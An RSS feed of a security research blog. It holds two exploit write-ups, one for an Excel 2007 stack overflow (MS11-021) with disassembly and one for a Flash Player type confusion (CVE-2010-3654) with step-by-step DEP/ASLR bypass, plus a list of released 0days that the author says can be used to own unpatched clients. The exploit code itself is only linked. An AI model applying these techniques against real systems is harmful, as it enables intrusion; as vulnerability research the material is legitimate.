<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Abysssec Security Research &#187; 0day</title>
	<atom:link href="http://www.abysssec.com/blog/tag/0day/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.abysssec.com/blog</link>
	<description>Security Researches , Advisories , Coding , Projects , Reversing , Exploitation , Fuzzing</description>
	<lastBuildDate>Tue, 31 Jan 2012 15:52:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021)</title>
		<link>http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/</link>
		<comments>http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/#comments</comments>
		<pubDate>Wed, 02 Nov 2011 18:47:48 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[Exploits / BUG Decryption]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[code execution]]></category>
		<category><![CDATA[excel]]></category>
		<category><![CDATA[ms11]]></category>
		<category><![CDATA[ms11-021]]></category>
		<category><![CDATA[office]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[sp2]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=1387</guid>
		<description><![CDATA[hello all as we didn&#8217;t publish any exploit for a bit we just going to release. 1) Advisory information Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability Vendor : http://www.microsoft.com Impact : Critical Contact : info [at] abysssec.com Twitter : @abysssec Microsoft : A remote code execution vulnerability exists in the way that Microsoft [...]]]></description>
			<content:encoded><![CDATA[<p>hello all</p>
<p>as we didn&#8217;t publish any exploit for a bit we just going to release.</p>
<h2>1) Advisory information</h2>
<p>Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability</p>
<p>Vendor : http://www.microsoft.com<br />
Impact : Critical<br />
Contact : info [at] abysssec.com<br />
Twitter : @abysssec</p>
<p>Microsoft :<br />
A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files.An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>
<h2>2) Vulnerability detail</h2>
<p>each excel file can contain multiple BOF (2057) records . This record specifies the first substream associated with workbook.One of the fields in these records, specify substream recordd to come with. This field can be extracted from sub_3018F0C2 function.</p>
<p><code> .text:301A0C87 push [ebp+arg_2C]<br />
.text:301A0C8A mov ecx, [ebp+var_14]<br />
.text:301A0C8D push 1<br />
.text:301A0C8F call sub_3018F0C2<br />
.text:301A0C94 mov ecx, eax<br />
.text:301A0C96 mov eax, [ebp+arg_24]<br />
.text:301A0C99 cmp eax, ebx<br />
.text:301A0C9B mov [ebp+var_10], ecx<br />
.text:301A0C9E jz short loc_301A0CA2<br />
.text:301A0CA0 mov [eax], ecx<br />
</code></p>
<p>If the field value is equal with 400, sub_3019DFBA function is called to check file type. if file type is xls EXCEL.exe will display a message If approved it will continue to run the code.if you change file extension to xlb there will be any message. After this step sub_3053F626 function will be executed. This function will parse the next BOF records.</p>
<p><code><br />
.text:304D4E9D cmp [ebp+arg_20], ebx<br />
.text:304D4EA0 jnz short loc_304D4EC6<br />
.text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h<br />
.text:304D4EAC jnz short loc_304D4EC6<br />
.text:304D4EAE mov edx, [ebp+arg_C]<br />
.text:304D4EB1 mov ecx, [ebp+arg_8]<br />
.text:304D4EB4 push 3Fh<br />
.text:304D4EB6 call sub_3019DFBA<br />
.text:304D4EBB cmp eax, ebx<br />
.text:304D4EBD mov [ebp+var_8], eax<br />
.text:304D4EC0 jz loc_304D4FD3<br />
.text:304D4EC6<br />
.text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j<br />
.text:304D4EC6 ; sub_301A0BC7+3342E5j<br />
.text:304D4EC6 push ebx<br />
.text:304D4EC7 push dword_30EB89A4<br />
.text:304D4ECD push [ebp+var_C]<br />
.text:304D4ED0 call sub_3053F626<br />
.text:304D4ED5 cmp dword_30F5E64C, ebx<br />
.text:304D4EDB mov [ebp+var_8], eax<br />
.text:304D4EDE jz short loc_304D4EE7<br />
.text:304D4EE0 cmp eax, ebx<br />
.text:304D4EE2 jz short loc_304D4EE7<br />
</code></p>
<p>one of records may come after BOF,is undocumented record which have record type equal to 0xA7 (167). for truly parsing this record should come with another record with 0x3C (60) record type. if it meet this requirement the length of records will be read and copied to the stack the function which operation of copying data records in the stack is sub_30199E55. This function takes three arguments .The first argument specifies the number of bytes to copy, which will read from file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data can be copied. values of the second and third arguments based on the amount of computing reading from file and into this cumpoting,computational error which may occur here &#8230;</p>
<p><code><br />
.text:3053F830 call sub_301A0A01<br />
.text:3053F835 cmp eax, 3Ch<br />
.text:3053F838 mov [ebp+var_ED4], eax<br />
.text:3053F83E jnz loc_30540488<br />
.text:3053F844 call sub_301A0A01<br />
.text:3053F849 mov ecx, [ebp+var_EDC]<br />
.text:3053F84F imul ecx, [ebp+var_F00]<br />
.text:3053F856 mov edi, eax<br />
.text:3053F858 mov eax, [ebp+var_EE0]<br />
.text:3053F85E lea ebx, [ecx+eax+3]<br />
.text:3053F862 call sub_301A0ABE<br />
.text:3053F867 push 0FFFFFFFDh<br />
.text:3053F869 pop edx<br />
.text:3053F86A sub edx, ecx<br />
.text:3053F86C add eax, edx<br />
.text:3053F86E push eax ; Dst<br />
.text:3053F86F push ebx ; int<br />
.text:3053F870 mov eax, edi<br />
.text:3053F872 call sub_30199E55<br />
</code></p>
<p>the vulnerability that exists here is that we can change the value of parameter 3 whith our own values. program will not correcly controll third argument of sub_30199E55 this and can result in the desired amount and location of desired data can overwrite in the stack.</p>
<p><code><br />
.text:30199E60 cmp edi, [esp+4+Dst]<br />
.text:30199E64 ja loc_303EE1B7<br />
.text:30199E6A mov ecx, [esp+4+arg_0]<br />
.text:30199E6E push ebx<br />
.text:30199E6F mov ebx, dword_30F726C0<br />
.text:30199E75 push ebp<br />
.text:30199E76 mov ebp, nNumberOfBytesToRead<br />
.text:30199E7C push esi<br />
.text:30199E7D mov [esp+10h+Dst], ecx<br />
....<br />
.text:30199E93 mov eax, [esp+10h+Dst]<br />
.text:30199E97 push esi ; Size<br />
.text:30199E98 lea edx, dword_30F6E6B8[ebx]<br />
.text:30199E9E push edx ; Src<br />
.text:30199E9F push eax ; Dst<br />
.text:30199EA0 sub edi, esi<br />
.text:30199EA2 call memcpy<br />
.text:30199EA7 add [esp+1Ch+Dst], esi<br />
.text:30199EAB add ebx, esi<br />
.text:30199EAD add esp, 0Ch<br />
.text:30199EB0 test edi, edi<br />
.text:30199EB2 mov dword_30F726C0, ebx<br />
.text:30199EB8 jnz loc_301E0DB3<br />
</code></p>
<h2>3) Exploitation :</h2>
<p>Stack overflows are not hard to exploit at all ! but as we have both /GS , SAFESEH here. because given that we are destined to memcpy we can change it so that it begins to overwrite the stack after GS. and from there when the return comes , our values contained in the ESP and we can call it with simple call esp and game is over !!!</p>
<p>&nbsp;</p>
<p style="text-align: left;"><a href="http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/memcpy/" rel="attachment wp-att-1388"><img class="aligncenter size-full wp-image-1388" title="memcpy" src="http://www.abysssec.com/blog/wp-content/uploads/2011/11/memcpy.png" alt="" width="428" height="267" /></a></p>
<h6 style="text-align: left;">download full exploit source  : <a href="http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/ms11-021/" rel="attachment wp-att-1456" target="_blank">MS11-021</a></h6>
<p>Happy Hacking .</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploiting Adobe Flash Player on Windows 7</title>
		<link>http://www.abysssec.com/blog/2011/04/18/exploiting-adobe-flash-player-on-windows-7/</link>
		<comments>http://www.abysssec.com/blog/2011/04/18/exploiting-adobe-flash-player-on-windows-7/#comments</comments>
		<pubDate>Mon, 18 Apr 2011 09:18:51 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[advisory]]></category>
		<category><![CDATA[Exploits / BUG Decryption]]></category>
		<category><![CDATA[Fuzzing / Auditing]]></category>
		<category><![CDATA[reversing]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[CVE2010-3654]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[IE8]]></category>
		<category><![CDATA[win7]]></category>
		<category><![CDATA[windows7]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=1302</guid>
		<description><![CDATA[Hello again . as a lot of readers like windows 7 exploits here is other one . 1) Advisory information Title                   : Adobe Flash player Action script type confusion &#160; Version             :  flash10h.dll Discovery         :  Malware writers Exploit              :  www.abysssec.com Vendor             :  http://www.adobe.com Impact              :  Critical Contact            :   info  [at] abysssec.com Twitter     [...]]]></description>
			<content:encoded><![CDATA[<p>Hello again . as a lot of readers like windows 7 exploits here is other one .</p>
<p><a href="http://www.abysssec.com/blog/wp-content/uploads/2011/04/FlashPlayerZeroDayVulnerability_thumb.jpg"><img class="aligncenter size-full wp-image-1303" title="FlashPlayerZeroDayVulnerability_thumb" src="http://www.abysssec.com/blog/wp-content/uploads/2011/04/FlashPlayerZeroDayVulnerability_thumb.jpg" alt="" width="293" height="293" /></a></p>
<h2>1) Advisory information</h2>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="638" valign="top"><strong> Title                   : </strong><strong>Adobe   Flash player Action script type confusion</strong><strong> </strong>&nbsp;</p>
<p><strong> Version             :  flash10h.dll</strong></p>
<p><strong> Discovery         :  Malware writers </strong></p>
<p><strong> Exploit              :  www.abysssec.com</strong></p>
<p><strong> Vendor             :  <a href="http://www.adobe.com/">http://www.adobe.com</a></strong></p>
<p><strong> Impact              :  Critical</strong></p>
<p><strong> Contact            :   info  [at] abysssec.com</strong></p>
<p><strong> Twitter            : @abysssec</strong></p>
<p><strong> CVE                    : </strong><strong>CVE-2010-3654</strong><strong> </strong></td>
</tr>
</tbody>
</table>
<h2>2) Vulnerable version</h2>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="638" valign="top"><strong>Adobe   Flash Player 10.1.53 .64</strong><strong> prior versions</strong></td>
</tr>
</tbody>
</table>
<h2>3) Vulnerability information</h2>
<p>&nbsp;</p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="638" valign="top">Class&nbsp;</p>
<p><strong> 1- Type Confusion</strong></p>
<p>Impact<strong> </strong></p>
<p><strong>Successfully   exploiting this issue allows remote attackers to execute code under the   context of targeted browser.</strong></p>
<p>Remotely   Exploitable</p>
<p><strong>Yes</strong></p>
<p>Locally   Exploitable<strong> </strong></p>
<p><strong>Yes</strong></td>
</tr>
</tbody>
</table>
<h2>4) Vulnerability detail</h2>
<p>Here we have type confusion vulnerability in ActionScript bytecode language. The cause of these vulnerabilities is because of implementation of verification process in AS3 jit engine that because of some miscalculation in verifying datatype atoms, some data replaces another type of data and the confusion results in faulty machine code.</p>
<p>Action script has the following structure. First our scripts are compiled using an action script compiler like flex to AS3 ByteCodes and embed it to DoABC, DoAction or DoInitAction tags in swf file format. When flash player opens the swf file, bytecodes are compiled to a jitted machine code through verification and generation process. Verification process is responsible for checking bytecodes to be valid instructions and it pass the valid bytecodes to generation process, thus generation process produces the machine code in memory.</p>
<p>According to Dion Blazakis’s JIT Spray paper:</p>
<p style="text-align: center;"><a href="http://www.abysssec.com/blog/wp-content/uploads/2011/04/AS1.png"><img class="aligncenter size-full wp-image-1306" title="AS" src="http://www.abysssec.com/blog/wp-content/uploads/2011/04/AS1.png" alt="" width="499" height="202" /></a></p>
<p>&nbsp;</p>
<p>To handle this runtime typing requirement, the ActionScript interpreter represents internal objects using tagged pointers – internal, this object is called an “atom”. Tagged pointers are a common implementation technique to differentiate between those objects stored by value and those stored by reference using the same word sized memory cell. A tagged pointer stores type information in the least significant bits and stores a type specific values in the most significant bits. As shown in Illustration 1, the ActionScript atom is 32 bits wide; it allocates 3 bits to store the type information and uses 29 bits for the value.</p>
<p>So if it would be possible to confuse verifier too act an atom as another atom by some bytecode changes it would be possible to generate faulty code that most of the times lead to disclosing a vtable pointer call to the attacker.</p>
<p>The bug is perfectly presented in Haifei li recent slides. We have OriginalClass and RefClass with the same functions. Func1 &#8211; OriginalClass return a class objects, but Func1 – RefClass returns another type. By changing a byte in the bytecode we have confused AS3 to execute RefClass functions in the main class. After that verifier confuses the return type of the function with an OriginalClass object and generate faulty code with the vtable under the control of the return value.</p>
<p><a href="http://www.abysssec.com/blog/wp-content/uploads/2011/04/windbg.png"><img class="aligncenter size-full wp-image-1305" title="windbg" src="http://www.abysssec.com/blog/wp-content/uploads/2011/04/windbg.png" alt="" width="592" height="128" /></a></p>
<p>&nbsp;</p>
<p>Exploitation:</p>
<p>For exploitation purpose on recent protections on windows 7 without any 3<sup>rd</sup> party, it is possible to use the same bug many times to leak the imageBase address and payload address. In our exploit we used three confusion to read String Objects address and accordingly imagebase address.</p>
<p><a href="http://www.abysssec.com/blog/wp-content/uploads/2011/04/Chart.png"><img class="aligncenter size-full wp-image-1307" title="Chart" src="http://www.abysssec.com/blog/wp-content/uploads/2011/04/Chart.png" alt="" width="291" height="297" /></a></p>
<p>Step1: read shellcode string object pointer by confusing it with uint and use it to leak ImageBase.</p>
<p>Step2: leak address of the shellcode with the same pointer and NewNumber trick.</p>
<p>Step3: send imageBase &amp; shellcode address as parameters to the RopPayload function, develop Rop payload string and again confuse the return value with uint to read address of RopPayload string.</p>
<p>Step4: send address of the rop payload as parameters to the last confused function that confuses string type with class object. And thus address of our rop payload will be used as vtable in the fake class object.</p>
<p>Note: In using strings as a buffer for shellcode in action script, it is important to use alphanumeric characters because the toString method converts our ascii character set to uincode thus make our shellcode unusable.</p>
<h2>5) Conclusion</h2>
<p>Finally we got the point that memory leakages are extremely useful in modern exploitation to bypass DEP, ASLR protections. It would be possible to find same atom confusion situation and other object leakage in adobe flash player. Kudos to haifei li for his great research, although it was not that simple to implement a reliable exploit with just slides without attending in talk.</p>
<h2>6) Refrences</h2>
<p><a href="http://cansecwest.com/csw11/Flash_ActionScript.ppt" target="_blank">http://www.cansecwest.com/csw11/Flash_ActionScript.ppt</a></p>
<p><a href="http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf" target="_blank">http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf</a></p>
<h2>7) Exploit-Code</h2>
<p>Here you can get our reliable exploit against windows 7 :</p>
<p>calc.exe payload</p>
<p>Download : <a href="http://www.abysssec.com/blog/wp-content/uploads/2011/04/CVE-2010-3654_Win7.zip">CVE-2010-3654_Win7</a></p>
<p style="text-align: center;"><a href="http://www.abysssec.com/blog/wp-content/uploads/2011/04/Exploited.png" target="_blank"><img class="aligncenter size-medium wp-image-1317" title="Exploited" src="http://www.abysssec.com/blog/wp-content/uploads/2011/04/Exploited-300x151.png" alt="" width="300" height="300" /></a></p>
<p>if you need other payloads for sure you know how to change it ;)</p>
<p>as always feedbacks are welcomed and you can follow @abysssec in twitter to getting updates .</p>
<p>Happy Hunting !</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2011/04/18/exploiting-adobe-flash-player-on-windows-7/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MOAUB – Day by Day</title>
		<link>http://www.abysssec.com/blog/2010/09/01/moaub-1/</link>
		<comments>http://www.abysssec.com/blog/2010/09/01/moaub-1/#comments</comments>
		<pubDate>Wed, 01 Sep 2010 11:46:26 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[advisory]]></category>
		<category><![CDATA[Exploits / BUG Decryption]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[reversing]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[binary analysis]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[exploit-db]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[MOAUB]]></category>
		<category><![CDATA[shahin]]></category>
		<category><![CDATA[shahin ramezany]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=1212</guid>
		<description><![CDATA[Yes ! finally MOAUB (Month of Abysssec Undisclosed Bugs) started and finished as well. Good Or Bad we released lots of 0days and binary analyses during a month (September) and you can use these info for owning websites UN-patched clients  or writing more secure applications . here is summary: Day1: Binary Analysis: MOAUB #1 &#8211; [...]]]></description>
			<content:encoded><![CDATA[<p>Yes ! finally MOAUB (Month of Abysssec Undisclosed Bugs) started and finished as well.</p>
<p style="text-align: center;"><img class="aligncenter" src="http://www.exploit-db.com/images/MOAUB/MOAUB-1.png" alt="Month of all User Bugs" /></p>
<p>Good Or Bad we released lots of 0days and binary analyses during a month (September) and you can use these info for owning websites UN-patched clients  or writing more secure applications .</p>
<p>here is summary:</p>
<p><strong>Day1:</strong></p>
<p>Binary Analysis:</p>
<p><strong><a href="http://www.exploit-db.com/exploits/14853">MOAUB #1 &#8211; Adobe Acrobat Reader and Flash Player “newclass” invalid pointer</a></strong></p>
<p><strong><a href="http://www.exploit-db.com/download_pdf/14863">MOAUB #1 &#8211; Adobe Acrobat Reader and Flash Player “newclass” invalid pointer &#8211; Binary Analysis</a></strong><strong> </strong></p>
<p><strong>0day:</strong></p>
<p><strong><a href="http://www.exploit-db.com/exploits/14854">MOAUB #1 &#8211; Cpanel PHP Restriction Bypass Vulnerability 0day</a></strong></p>
<p><strong><a href="http://www.exploit-db.com/download_pdf/14864">MOAUB #1 &#8211; Cpanel PHP Restriction Bypass Vulnerability 0day</a></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day2:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/14869">MOAUB #2 &#8211; Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability</a></p>
<p><a href="http://www.exploit-db.com/download_pdf/14871">MOAUB #2 &#8211; Apple QuickTime FlashPix NumberOfTiles Vulnerability &#8211; Binary Analysis</a></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/14870">MOAUB #2 &#8211; Rainbowportal Multiple Remote Vulnerabilities</a></p>
<p><a href="http://www.exploit-db.com/download_pdf/14872">MOAUB #2 &#8211; Rainbowportal Multiple Remote Vulnerabilities – 0day</a><strong> </strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day3:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/14878">MOAUB #3 &#8211; Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution</a><strong> </strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14881">MOAUB #3 &#8211; Trend Micro Internet Security Pro 2010 ActiveX extSetOwner &#8211; Binary Analysis</a><strong> </strong></p>
<p><strong>0day:</strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14879">MOAUB #3 &#8211; Visinia 1.3 Multiple Vulnerabilities</a></span><strong> </strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14880">MOAUB #3 &#8211; Visinia CMS Multiple Vulnerabilities &#8211; 0day</a><strong> </strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day4:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/14886">MOAUB #4 &#8211; Movie Maker Remote Code Execution (MS10-016)</a><strong> </strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14889">MOAUB #4 – Movie Maker Remote Code Execution (MS10-016) &#8211; Binary Analysis</a></span><strong> </strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/14887">MOAUB #4 &#8211; syndeocms 2.8.02 Multiple Vulnerabilities</a><strong> </strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14888">MOAUB #4 – Syndeocms 2.8.02 Multiple Vulnerabilities &#8211; 0day</a><strong> </strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day5:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/14895">MOAUB #5 &#8211; Microsoft MPEG Layer-3 Remote Command Execution Exploit</a><strong> </strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14899">MOAUB #5 &#8211; Microsoft MPEG Layer-3 Remote Command Execution &#8211; Binary Analysis</a><strong> </strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/14898">MOAUB #5 &#8211; IfNuke Multiple Remote Vulnerabilities 0day</a><strong> </strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14900">MOAUB #5 &#8211; IfNuke Multiple Remote Vulnerabilities 0day</a><strong> </strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day6:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/14916">MOAUB #6 &#8211; HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution</a><strong> </strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14918">MOAUB #6 – HP OpenView NNM webappmon execvp_nc Remote Code Execution &#8211; Binary Analysis</a><strong> </strong></p>
<p><strong>0day:</strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14915">MOAUB #6 &#8211; InterPhoto Gallery Multiple Remote Vulnerabilities</a></span><strong> </strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14917">MOAUB #6 – InterPhoto Gallery Multiple Remote Vulnerabilities &#8211; 0day</a></span><strong> </strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day7:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/exploits/14928">MOAUB #7 &#8211; Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14930">MOAUB #7 &#8211; Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/14927">MOAUB #7 &#8211; DynPage &lt;= v1.0 Multiple Remote Vulnerabilities &#8211; 0day</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14929">MOAUB #7 &#8211; DynPage &lt;= v1.0 Multiple Remote Vulnerabilities &#8211; 0day</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day8:</strong></p>
<p>Binary Analysis:</p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14944">MOAUB #8 &#8211; Microsoft Office Visio DXF File Stack based Overflow</a></span><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14946">MOAUB #8 &#8211; Microsoft Office Visio DXF File Stack based Overflow &#8211; Binary Analysis</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/14943">MOAUB #8 &#8211; Sirang Web-Based D-Control Multiple Remote Vulnerabilities</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14945">MOAUB #8 – Sirang Web-Based D-Control Multiple Remote Vulnerabilities &#8211; 0 day</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day9:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/download_pdf/14950">MOAUB #9 &#8211; Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14949">MOAUB #9 &#8211; Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14948">FestOS CMS 2.3b Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14951">MOAUB #9 – FestOS CMS 2.3b Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day10:</strong></p>
<p>Binary Analysis:</p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14956">MOAUB #10 &#8211; Excel RTD Memory Corruption</a></span><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14966">MOAUB #10 &#8211; Excel RTD Memory Corruption</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14954">MOAUB #10 &#8211; aradBlog Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/download_pdf/14957">MOAUB #10 &#8211; aradBlog Multiple Remote Vulnerabilities</a></span><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Day11:</strong></p>
<p>Binary Analysis:</p>
<p><a href="http://www.exploit-db.com/download_pdf/14972">MOAUB #11 &#8211; Microsoft Office Word 2007 sprmCMajority Buffer Overflow</a><strong></strong></p>
<p><span style="text-decoration: underline;"><a href="http://www.exploit-db.com/exploits/14971">MOAUB #11 &#8211; Microsoft Office Word 2007 sprmCMajority Buffer Overflow</a></span><strong></strong></p>
<p><strong>0day:</strong></p>
<p><a href="http://www.exploit-db.com/exploits/14969">MOAUB #11 &#8211; ASP Nuke SQL Injection Vulnerability</a><strong></strong></p>
<p><a href="http://www.exploit-db.com/download_pdf/14970">MOAUB #11 &#8211; ASP Nuke Sql Injection Vulnerability</a><strong></strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
